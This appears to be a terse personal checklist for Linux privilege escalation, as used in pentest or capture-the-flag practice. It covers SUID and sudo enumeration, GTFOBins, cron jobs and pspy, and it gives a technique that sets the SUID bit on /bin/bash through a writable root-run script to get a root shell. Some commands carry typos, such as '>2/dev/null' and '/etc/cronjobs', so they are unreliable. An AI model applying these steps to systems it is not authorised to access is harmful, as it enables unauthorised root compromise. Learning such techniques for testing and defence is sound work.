Checklist (priv esc)
Note: Linux page has few notes if you missed it
LinuxCheck linux OS version
Check kernel version (
uname -a
)Check sudo binary (
find / -perm -4000 -ls >2/dev/null
)sudo -l
to check if any sudo bit is enabled for that usercheck : https://gtfobins.github.io/ for sudo binary exploits
check cron jobs (
/etc/cronjobs
)well if you cant check root's cronjob directly ....... pspy might help
run
grep -nrw /dir/to/search/in -e "/path/of/script_or_file 2>/dev/null"
to check if any file runs/uses the file.
run pspy64 script (https://github.com/DominicBreuker/pspy)
Edit access on sudo script
echo 'chmod u+s /bin/bash' > /path/to/script/file.sh
#then type
/bin/bash -p #to get root shell
Last updated